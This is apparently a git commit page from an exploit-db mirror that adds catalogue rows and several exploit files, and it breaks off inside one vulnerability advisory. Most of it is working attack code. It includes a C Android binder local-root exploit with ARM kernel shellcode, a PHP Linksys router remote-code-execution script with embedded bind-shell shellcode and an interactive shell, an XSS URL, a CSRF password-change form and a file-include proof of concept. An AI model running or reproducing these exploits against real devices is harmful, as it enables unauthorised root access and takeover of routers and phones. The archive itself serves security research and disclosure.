bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 02_18_2014

Browse source
This commit is contained in:
Offensive Security 2014-02-18 04:28:00 +00:00
parent 681c155d4f
commit 182f5dc596
31 changed files with 3599 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

30
files.csv
View file

@ -28161,6 +28161,7 @@ id,file,description,date,author,platform,type,port
31345,platforms/windows/remote/31345.txt,"MicroWorld eScan Server 9.0.742 Directory Traversal Vulnerability",2008-03-06,"Luigi Auriemma",windows,remote,0
31346,platforms/linux/local/31346.c,"Linux 3.4+ Arbitrary write with CONFIG_X86_X32",2014-02-02,saelo,linux,local,0
31347,platforms/linux/local/31347.c,"linux 3.4+ local root (CONFIG_X86_X32=y)",2014-02-02,rebel,linux,local,0
31350,platforms/php/webapps/31350.txt,"CiMe - Citas Médicas - Multiple Vulnerabilities",2014-02-03,vinicius777,php,webapps,80
31351,platforms/php/webapps/31351.txt,"PHP-Nuke 4nChat Module 0.91 'roomid' Parameter SQL Injection Vulnerability",2008-03-06,meloulisi,php,webapps,0
31352,platforms/php/webapps/31352.txt,"ImageVue 1.7 popup.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0
31353,platforms/php/webapps/31353.txt,"ImageVue 1.7 dir2.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0
@ -28317,6 +28318,7 @@ id,file,description,date,author,platform,type,port
31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 include/adminHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 (geo_zones.php, zID param) - SQL Injection Vulnerability",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80
31516,platforms/php/webapps/31516.txt,"Serendipity 1.7.5 (Backend) - Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80
31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 and 3.2.42.0 - Stored XSS",2014-02-07,"Luigi Vezzoso",php,webapps,80
31518,platforms/linux/remote/31518.rb,"Pandora FMS Remote Code Execution",2014-02-07,metasploit,linux,remote,8023
@ -28324,6 +28326,8 @@ id,file,description,date,author,platform,type,port
31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80
31521,platforms/php/webapps/31521.txt,"doorGets CMS 5.2 - SQL Injection Vulnerability",2014-02-07,"High-Tech Bridge SA",php,webapps,80
31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash PoC",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80
31524,platforms/windows/local/31524.rb,"Publish-It 3.6d (.pui) - SEH Buffer Overflow",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0
31525,platforms/php/webapps/31525.txt,"MyBB Extended Useradmininfo Plugin 1.2.1 - Cross Site Scripting",2014-02-09,"Fikri Fadzil",php,webapps,80
31527,platforms/hardware/webapps/31527.nse,"ZTE ZXV10 W300 Router - Hardcoded Credentials",2014-02-09,"Cesar Neira",hardware,webapps,80
31528,platforms/php/webapps/31528.txt,"Le Forum 'Fichier_Acceuil' Parameter Remote File Include Vulnerability",2008-03-24,ZoRLu,php,webapps,0
31529,platforms/php/webapps/31529.txt,"Joomla! and Mambo Cinema Component 1.0 'id' Parameter SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0
@ -28362,7 +28366,9 @@ id,file,description,date,author,platform,type,port
31568,platforms/php/webapps/31568.txt,"PHP Classifieds 6.20 Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,php,webapps,0
31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Router - CSRF Vulnerability",2014-02-11,killall-9,hardware,webapps,80
31570,platforms/php/webapps/31570.txt,"Wordpress Frontend Upload Plugin - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80
31571,platforms/php/webapps/31571.txt,"Wordpress Buddypress Plugin 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80
31573,platforms/hardware/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,hardware,webapps,8880
31574,platforms/arm/local/31574.c,"Linux ARM - Local Root Exploit",2014-02-11,"Piotr Szerman",arm,local,0
31575,platforms/windows/remote/31575.rb,"KingScada kxClientDownload.ocx ActiveX Remote Code Execution",2014-02-11,metasploit,windows,remote,0
31576,platforms/windows/local/31576.rb,"Windows TrackPopupMenuEx Win32k NULL Page",2014-02-11,metasploit,windows,local,0
31577,platforms/unix/remote/31577.rb,"Kloxo SQL Injection and Remote Code Execution",2014-02-11,metasploit,unix,remote,7778
@ -28461,3 +28467,27 @@ id,file,description,date,author,platform,type,port
31679,platforms/php/webapps/31679.txt,"PortailPHP 2.0 'mod_search' Remote File Include Vulnerability",2008-04-21,ZoRLu,php,webapps,0
31681,platforms/php/webapps/31681.py,"XOOPS 2.0.14 Article Module 'article.php' SQL Injection Vulnerability",2008-04-21,Cr@zy_King,php,webapps,0
31682,platforms/php/webapps/31682.txt,"S9Y Serendipity 1.3 Referer HTTP Header XSS",2008-04-22,"Hanno Boeck",php,webapps,0
31683,platforms/hardware/remote/31683.php,"Linksys E-series Unauthenticated Remote Code Execution Exploit",2014-02-16,Rew,hardware,remote,0
31686,platforms/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,multiple,webapps,80
31688,platforms/windows/local/31688.pl,"ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)",2014-02-16,"Mike Czumak",windows,local,0
31689,platforms/windows/remote/31689.py,"HP Data Protector EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555
31690,platforms/hardware/webapps/31690.txt,"Trendchip HG520 ADSL2+ Wireless Modem CSRF Vulnerability",2014-02-16,"Dhruv Shah",hardware,webapps,80
31691,platforms/hardware/webapps/31691.txt,"Office Assistant Pro 2.2.2 iOS - File Include Vulnerability",2014-02-16,Vulnerability-Lab,hardware,webapps,8080
31692,platforms/hardware/webapps/31692.txt,"mbDriveHD 1.0.7 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,hardware,webapps,8080
31693,platforms/hardware/webapps/31693.txt,"File Hub 1.9.1 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,hardware,webapps,8080
31695,platforms/php/remote/31695.rb,"Dexter (CasinoLoader) SQL Injection",2014-02-16,metasploit,php,remote,0
31697,platforms/php/webapps/31697.txt,"Horde Webmail 1.0.6 'addevent.php' Cross-Site Scripting Vulnerability",2008-04-23,"Aria-Security Team",php,webapps,0
31698,platforms/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN 'installControl.php3' Cross-Site Scripting Vulnerability",2008-04-23,"Alberto Cuesta Partida",hardware,remote,0
31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 URI Redirection Vulnerability",2008-04-23,"Richard Brain",windows,remote,0
31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0
31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 'base.php' Parameter Cross-Site Scripting Vulnerability",2008-04-24,ZoRLu,php,webapps,0
31702,platforms/php/webapps/31702.txt,"PHP-Nuke DownloadsPlus Module Arbitrary File Upload Vulnerability",2008-04-24,ZoRLu,php,webapps,0
31703,platforms/php/webapps/31703.txt,"Pixel Motion Blog 'list_article.php' Cross-Site Scripting Vulnerability",2008-04-24,ZoRLu,php,webapps,0
31704,platforms/php/webapps/31704.txt,"PHCDownload 1.1 admin/index.php hash Parameter SQL Injection",2008-04-24,ZoRLu,php,webapps,0
31705,platforms/php/webapps/31705.txt,"PHCDownload 1.1 upload/install/index.php step Parameter XSS",2008-04-24,ZoRLu,php,webapps,0
31706,platforms/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 URI Handler Command Execution Vulnerability",2008-04-24,"Thomas Pollet",unix,remote,0
31708,platforms/php/webapps/31708.txt,"Joomla Visites 1.1 Component mosConfig_absolute_path Remote File Include Vulnerability",2008-04-26,NoGe,php,webapps,0
31709,platforms/php/webapps/31709.txt,"Siteman 2.0.x2 'module' Parameter Cross-Site Scripting and Local File Include Vulnerability",2008-04-26,IRCRASH,php,webapps,0
31711,platforms/windows/dos/31711.html,"Microsoft Excel 2007 JavaScript Code Remote Denial Of Service Vulnerability",2008-04-26,"Juan Pablo Lopez Yacubian",windows,dos,0
31712,platforms/php/webapps/31712.txt,"miniBB 2.2 'bb_admin.php' Cross-Site Scripting Vulnerability",2008-04-28,IRCRASH,php,webapps,0
31713,platforms/linux/dos/31713.py,"PeerCast 0.1218 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities",2008-04-29,"Nico Golde",linux,dos,0

Can't render this file because it is too large.

150
platforms/arm/local/31574.c Executable file
View file

@ -0,0 +1,150 @@
/*
* Just a lame binder local root exploit stub. Somewhat messy but whatever. The bug was reported in CVE-2013-6282.
*
* Tested on Android 4.2.2 and 4.4. Kernels 3.0.57, 3.4.5 and few more. All up to 3.4.5 unpatched should be vulnerable.
* You need to customize the addresses so that they match the target board. On Android, both /proc/kallsyms and dmesg are
* restricted, thus no automation here.
*
* Rigged up by Piotr Szerman. (c) 2013
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
/* Binder transaction request format */
struct binder_write_read {
signed long write_size; /* bytes to write */
signed long write_consumed; /* bytes consumed by driver */
unsigned long write_buffer;
signed long read_size; /* bytes to read */
signed long read_consumed; /* bytes consumed by driver */
unsigned long read_buffer;
} bwr;
#define BR_NOOP 0x0000720c /* binder memory write value */
#define SC_TABLE 0xc000ee28 /* system call table address */
/* we need to know the lower halfword of the original address of sys_ni_syscall to tailor MMAP_AREA and MMAP_OFF accordingly.
* you can aid yourself with a NOP block. the higher halfword will in any case become 0x720c. on one of my boxes, the other
* halfword was 0xdac4. MMAP_AREA must be aligned appropriately. you can extract all the data in question at runtime from
* /proc/kallsyms and dmesg (not that hard to set off infoleaks with this bug) as long as there are no contraints in place
*/
#define MMAP_AREA 0x720cd000 /* userspace landing point page-aligned address. */
#define MMAP_OFF 0xac4 /* offset within it to plant the payload */
#define NUM_PAGES 16
#define PAGE_SIZE 4096
#define NOP 0xe1a00000 /* mov r0, r0 */
#define SHELL "/system/bin/sh"
#define TARGET_APERTURE 68 /* aiming for two adjacent non-implemented syscalls. check arch/arm/kernel/calls.S */
#define BINDER_WRITE_READ 0xc0186201 /* printk your BINDER_WRITE_READ ;) */
/* the target payload */
void __attribute__((regparm(3))) shellcode(void)
{
asm volatile(
"__transgressor:;"
"push {r0-r12,lr}" "\n\t"
"mov r1, sp" "\n\t" /* calculate the process descriptor location */
"bic r2, r1, #8128" "\n\t"
"bic r2, r2, #63" "\n\t"
"ldr r3, [r2, #12]" "\n\t"
"movt r0, #0" "\n\t"
"movw r0, #0" "\n\t"
"ldr r1, [r3, #492]" "\n\t" /* cred's location may differ depending on the kernel config.
* just build and objdump a kernel module with printk(current->cred->uid)
* to find out. or pinpoint it with the help of kgdb or whatever ;)
*/
"mov r4, #8" "\n\t"
"__loop_cred:;"
"sub r4, r4, #1" "\n\t"
"str r0, [r1, #4]!" "\n\t"
"teq r4, #0" "\n\t"
"bne __loop_cred" "\n\t"
"ldr r1, [r3, #488]" "\n\t" /* real_cred. overkill? */
"mov r4, #8" "\n\t"
"__loop_real_cred:;"
"sub r4, r4, #1" "\n\t"
"str r0, [r1, #4]!" "\n\t"
"teq r4, #0" "\n\t"
"bne __loop_real_cred" "\n\t"
"ldm sp!, {r0-r12,pc}" "\n\t" /* return to ret_fast_syscall */
"mov pc, lr" "\n\t"
);
}
int
main(int ac, char **av)
{
char * const shell[] = { SHELL, NULL };
char *map;
int fd;
fprintf(stderr, "[!] binder local root exploit\n[!] (c) piotr szerman\n");
fd = open("/dev/binder", O_RDWR);
if(fd < 0)
{
fprintf(stderr, "[-] failed to reach out for binder. (%s)\n", strerror(errno));
exit(EXIT_FAILURE);
}
map = mmap((void *)MMAP_AREA, NUM_PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_LOCKED, 0, 0);
if(map == (void *)-1)
{
perror("mmap() ");
exit(EXIT_FAILURE);
}
fprintf(stderr, "[+] userspace map area == 0x%08lx\n", (unsigned long)map);
fprintf(stderr, "[+] placing NOP block at 0x%08lx\n", (unsigned long)map);
memset(map, NOP, MMAP_OFF);
fprintf(stderr, "[+] copying payload to 0x%08lx\n", (unsigned long)map + MMAP_OFF);
/* look at the objdump of shellcode to see the correct offset */
memcpy(map + MMAP_OFF, (unsigned char *)shellcode + 8 /* offseting to the __transgressor */, 30 * sizeof(void *) /* copy all opcodes */);
fprintf(stderr, "[+] constructing rogue data structure.\n");
bwr.write_size = 0;
bwr.write_consumed = 0;
bwr.read_size = 1;
bwr.read_consumed = 0;
/* targeting the aperture between 2 undefined system calls in the table */
bwr.read_buffer = (unsigned long)((unsigned char *)SC_TABLE + TARGET_APERTURE * sizeof(void *) + 2);
/* calculate process descriptor address with the aid of sp:
* task_struct = *( ((unsigned long *) ( (sp & ~(0xbf000000 - 1)) & ~0x3f )) + 3);
*/
ioctl(fd, BINDER_WRITE_READ, &bwr);
close(fd);
sleep(5); /* give binder ample time to service the transaction. if it's under heavy load, the exploit might fail */
fprintf(stderr, "[+] r00ting device...\n\n");
asm volatile(
"mov r7, %0\n\t"
"swi 0\n\t"
: : "I" (TARGET_APERTURE)
);
execve(shell[0], shell, NULL);
return EXIT_FAILURE;
}

199
platforms/hardware/remote/31683.php Executable file
View file

@ -0,0 +1,199 @@
#!/usr/bin/php
<?php
/*
Exploit for 0day linksys unauthenticated remote code execution
vulnerability. As exploited by TheMoon worm; Discovered in
the wild on Feb 13, 2013 by Johannes Ullrich.
I was hoping this would stay under-wraps until a firmware
patch could be released, but it appears the cat is out of the bag...
http://www.reddit.com/r/netsec/comments/1xy9k6/that_new_linksys_worm/
Since it's now public, here's my take on it.
Exploit written by Rew.
(Yes I know, everyone hates PHP. Deal with it :P )
Currently only working over the LAN. I think there may be an
iptables issue or something. Left as an exercise to the reader.
Based on "strings" output on TheMoon worm binary, the
following devices may be vulnerable. This list may not be
accurate and/or complete!!!
E4200
E3200
E3000
E2500
E2100L
E2000
E1550
E1500
E1200
E1000
E900
E300
WAG320N
WAP300N
WAP610N
WES610N
WET610N
WRT610N
WRT600N
WRT400N
WRT320N
WRT160N
WRT150N
*/
error_reporting(0);
$host = "192.168.1.1"; // target host
$port = "8080"; // target port
$vuln = "tmUnblock.cgi"; // hndUnblock.cgi works too
// msfpayload linux/mipsle/shell_bind_tcp LPORT=4444 X
$shellcode = base64_decode(
"f0VMRgEBAQAAAAAAAAAAAAIACAABAAAAVABAADQAAAAAAAAAAA".
"AAADQAIAABAAAAAAAAAAEAAAAAAAAAAABAAAAAQAB7AQAAogIA".
"AAcAAAAAEAAA4P+9J/3/DiQnIMABJyjAAf//BihXEAIkDAEBAV".
"BzDyT//1Aw7/8OJCdwwAERXA0kBGjNAf/9DiQncMABJWiuAeD/".
"ra/k/6Cv6P+gr+z/oK8lIBAC7/8OJCcwwAHg/6UjSRACJAwBAQ".
"FQcw8kJSAQAgEBBSROEAIkDAEBAVBzDyQlIBAC//8FKP//BihI".
"EAIkDAEBAVBzDyT//1AwJSAQAv3/DyQnKOAB3w8CJAwBAQFQcw".
"8kJSAQAgEBBSjfDwIkDAEBAVBzDyQlIBAC//8FKN8PAiQMAQEB".
"UHMPJFBzBiT//9AEUHMPJP//BijH/w8kJ3jgASEg7wPw/6Sv9P".
"+gr/f/DiQncMABIWDvAyFojgH//6Ct8P+lI6sPAiQMAQEBL2Jp".
"bi9zaA=="
);
// regular urlencode() doesn't do enough.
// it will break the exploit. so we use this
function full_urlencode($string) {
$ret = "";
for($c=0; $c<strlen($string); $c++) {
if($string[$c] != '&')
$ret .= "%".dechex(ord($string[$c]));
else
$ret .= "&";
}
return $ret;
}
// wget is kind of a bad solution, because it requires
// the payload be accessable via port 80 on the attacker's
// machine. a better solution is to manually write the
// executable payload onto the filesystem with echo -en
// unfortunatly the httpd will crash with long strings,
// so we do it in stages.
function build_payload($host, $port, $vuln, $shellcode) {
// in case we previously had a failed attempt
// meh, it can happen
echo "\tCleaning up... ";
$cleanup = build_packet($host, $port, $vuln, "rm /tmp/c0d3z");
if(!send_packet($host, $port, $cleanup)) die("fail\n");
else echo "done!\n";
// write the payload in 20byte stages
for($i=0; $i<strlen($shellcode); $i+=20) {
echo "\tSending ".$i."/".strlen($shellcode)." bytes... ";
$cmd = "echo -en '";
for($c=$i; $c<$i+20 && $c<strlen($shellcode); $c++) {
$cmd .= "\\0".decoct(ord($shellcode[$c]));
}
$cmd .= "' >> /tmp/c0d3z";
$cmd = build_packet($host, $port, $vuln, $cmd);
if(!send_packet($host, $port, $cmd)) die("fail\n");
else echo "sent!\n";
usleep(100000);
}
// make it usable
echo "\tConfiguring... ";
$config = build_packet($host, $port, $vuln, "chmod a+rwx /tmp/c0d3z");
if(!send_packet($host, $port, $config)) die("fail\n");
else echo "done!\n";
}
// add in all the HTTP shit
function build_packet($host, $port, $vuln, $payload) {
$exploit = full_urlencode(
"submit_button=&".
"change_action=&".
"submit_type=&".
"action=&".
"commit=0&".
"ttcp_num=2&".
"ttcp_size=2&".
"ttcp_ip=-h `".$payload."`&".
"StartEPI=1"
);
$packet =
"POST /".$vuln." HTTP/1.1\r\n".
"Host: ".$host."\r\n".
// this username:password is never checked ;)
"Authorization: Basic ".base64_encode("admin:ThisCanBeAnything")."\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".strlen($exploit)."\r\n".
"\r\n".
$exploit;
return $packet;
}
function send_packet($host, $port, $packet) {
$socket = fsockopen($host, $port, $errno, $errstr);
if(!$socket) return false;
if(!fwrite($socket, $packet)) return false;
fclose($socket);
return true;
}
echo "Testing connection to target... ";
$socket = fsockopen($host, $port, $errno, $errstr, 30);
if(!$socket) die("fail\n");
else echo "connected!\n";
fclose($socket);
echo "Sending payload... \n";
build_payload($host, $port, $vuln, $shellcode);
sleep(3); // don't rush him
echo "Executing payload... ";
if(!send_packet($host, $port, build_packet($host, $port, $vuln, "/tmp/c0d3z"))) die("fail\n");
else echo "done!\n";
sleep(3); // don't rush him
echo "Attempting to get a shell... ";
$socket = fsockopen($host, 4444, $errno, $errstr, 30);
if(!$socket) die("fail\n");
else echo "connected!\n";
echo "Opening shell... \n";
while(!feof($socket)) {
$cmd = readline($host."$ ");
if(!empty($cmd)) readline_add_history($cmd);
// there has got to be a better way to detect that we have
// reached the end of the output than this, but whatever
// it's late... i'm tired... and it works...
fwrite($socket, $cmd.";echo xxxEOFxxx\n");
$data = "";
do {
$data .= fread($socket, 1);
} while(strpos($data, "xxxEOFxxx") === false && !feof($socket));
echo str_replace("xxxEOFxxx", "", $data);
}
?>

9
platforms/hardware/remote/31698.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28902/info
F5 Networks FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
FirePass 4100 SSL VPN Firmware 5.4.2-5.5.2 and 6.0-6.2 are vulnerable.
http://www.example.com/installControl.php3?1&%22%3E%3C/script%3E%3Ctextarea%3EHtml%20injection%3C/textarea%3E%3C!--= http://www.example.com/installControl.php3?>'"><script>alert(514)</script>

66
platforms/hardware/webapps/31690.txt Executable file
View file

@ -0,0 +1,66 @@
########################################################################
# Exploit Title: Trendchip HG520 ADSL2+ Wireless Modem CSRF Vulnerability
# Google Dork: N/A
# Date: 15/02/2014
# Exploit Author: Dhruv Shah
# Vendor Homepage: N/A
# Software Link : N/A
# Version: Firmware Version:2.11.38.0(RE0.C2B)3.9.9.5
# Tested on: Embedded Allegro RomPager webserver 4.07 UPnP/1.0 (ZyXEL
ZyWALL 2)
# Type of Application : Modem Web Application
# CVE : N/A
########################################################################
Cross Site Request Forgery
This Modem's Web Application , suffers from Cross-site request forgery
through which attacker can manipulate user data via sending him malicious
craft url.
The Modems's Application not using any security token to prevent it
against CSRF. You can manipulate any userdata. PoC and Exploit to change
user password:
In the POC the IP address in the POST is the modems IP address.
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" action="http://192.168.2.1/Forms/tools_admin_1"
name="tool_admin">
<input name="uiViewTools_Password" size="30" maxlength="30" value="admin"
type="PASSWORD">
<input name="uiViewTools_PasswordConfirm" size="30" maxlength="30"
value="admin" type="PASSWORD">
</form>
</body>
</html>
______________________
*Dhruv Shah* *aka Snypter*
http://security-geek.in/blog/
Blogger | Researcher | Consultant | Writer
Youtube <http://www.youtube.com/snypter> |
Facebook<http://www.facebook.com/dhruvshahs>|
Linkedin <http://in.linkedin.com/pub/dhruv-shah/26/4a6/aa0> |
Twitter<https://twitter.com/Snypter>|
Blog <http://security-geek.in/blog/>

207
platforms/hardware/webapps/31691.txt Executable file
View file

@ -0,0 +1,207 @@
Document Title:
===============
Office Assistant Pro v2.2.2 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1197
Release Date:
=============
2014-02-13
Vulnerability Laboratory ID (VL-ID):
====================================
1197
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
Office Assistant Pro is an All-Powerful office suite specially designed for you to deal with the Office affairs anywhere,
anytime on iPhone, iPad or iPod touch. With Office Assistant Pro, you can high-efficiently manage almost all type of
files by `ONE PAGE` model and make Notes, Reminders, Meeting Recorder as below. The powerful file manager: high-efficiently
File Management in only “ONE PAGE” and easily File Transferred between local and cloud storage. You can complete all of
your operations in `ONE PAGE`.
( Copy of the Homepage: https://itunes.apple.com/us/app/office-assistant-pro-full/id449595696 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official Beijing Elinasoft
Technologies - Office Assistant Pro v2.2.2 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-02-13: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Beijing Elinasoft Technologies
Product: Office Assistant Pro - iOS Mobile Web Application 2.2.2
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Beijing Elinasoft Office Assistant Pro v2.2.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
to compromise the web-application or mobile device.
The web vulnerability is located in the `file name` value of the `Upload` module POST method request. Remote attackers are able to inject own files
with malicious filename to compromise the mobile application. The attack vector is persistent and the request method is POST. The local file/path
include execution occcurs in the main file dir index- or sub category item listing of the file manager. The security risk of the local file include
web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.8(+)|(-)6.9.
Exploitation of the local file include web vulnerability requires no user interaction or privileged mobile web-application user account with password.
Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise by unauthorized local
file include web attacks.
Request Method(s):
[+] [POST]
Vulnerable Input(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Item Listing
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by remote attackers without user interaction or privileged mobile application user account.
For security demonstration or to reproduce the local file include web vulnerability follow the provided information and steps below.
Manually exploitation steps to reproduce the vulnerability ...
1. Install the Beijing Elinasoft Office Assistant Pro v2.2.2 iOS mobile web-application
2. Now visit from a remot ecomputer the wifi web-interface of the service
3. Click the upload button and tamper the next request (POST method)
4. Exchange the filename value with your own malicious local file or path request
5. Continue after the intercept and refresh the index file dir
6. The malicious local file request execution occurs in the main file dir index listing
7. Successful reproduce of the vulnerability!
PoC: Index File Dir Item Listing - Upload > [filename]
<tbody><tr><td>Name</td><td width="20px"> </td><td>Last modified</td><td width="20px"> </td>
<td style="text-align:right">Size</td></tr><tr><td colspan="5"><hr></td></tr><tr><td><a href="http://192.168.2.109:8080/User%20Manual/">User Manual/</a></td>
<td> </td><td style="font-size:9pt;">12.02.2014 01:43</td><td> </td><td style="text-align:right; font-size:9pt;">--</td></tr><tr><td colspan="5"><hr></td></tr>
<tr><td><a href="http://localhost:8080/%3%2F./[LOCAL FILE INCLUDE VULNERABILITY!]'<"><%2F./[LOCAL FILE INCLUDE VULNERABILITY!]'<"></a></td><td>
</td><td style="font-size:9pt;">12.02.2014
01:44</td><td> </td><td
style="text-align:right; font-size:9pt;"> 23.8
Kb</td></tr></table></p><form action=""
method="post" enctype="multipart/form-data" name="form1"
id="form1"><input type="file" name="file" id="file"
/></label><label><input type="submit" name="button"
id="button" value="Upload"
/></label></form><p> </p><hr
/><font size="2" style="color:gray">© 2014 Elinasoft
Technologies Ltd. All Rights Reserved.</font><br><font
size="2"><a
href="http://www.x.com">http://www.x.com</a></font><br><font size="2"><a
href="http://x.com/elinasoft">http://x.com/elinasoft</a></font><br><font size="2"><a
href="http://x.com/elinasoft">http://x.com/elinasoft</a></font></body></html></iframe></a></td></tr></tbody>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[1739] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.109:8080/]
Cookie[jtable%2376270709page-size=10]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------60102527228942
Content-Disposition: form-data; name="file"; filename="%2F./[LOCAL FILE INCLUDE VULNERABILITY!]'<"
Content-Type: image/jpeg
Reference(s): URL
http://localhost:8080/
Solution - Fix & Patch:
=======================
The local web vulnerability can be patched by a secure parse and input restriction of the vulnerable filename value.
Ensure that the POST method request of the upload function is secure to prevent file include and persistent script code injection attacks.
Security Risk:
==============
The security risk of the local file include web vulnerability is estimated as high(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

247
platforms/hardware/webapps/31692.txt Executable file
View file

@ -0,0 +1,247 @@
Document Title:
===============
mbDriveHD v1.0.7 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1198
Release Date:
=============
2014-02-14
Vulnerability Laboratory ID (VL-ID):
====================================
1198
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
mbDriveHD - Turn your iPad into a wireless network disk and document viewer. With mbDriveHD, transferring files to and
from your iPad has never been easier! Thanks to our lightning fast Web server build-in, you can use any web browser to
transfer your documents and files to/from iPad. This app has a 2.7 star rating, with ratings in 27 markets (36 ratings).
It occupies the 165441th position in our ranking with 52 points. It is among the 25% best ones of its category and among
the 25% best ones of the overall top.
( Copy of the Homepage: https://itunes.apple.com/us/app/mbdrivehd./id384867710 - Commercial $2.99 )
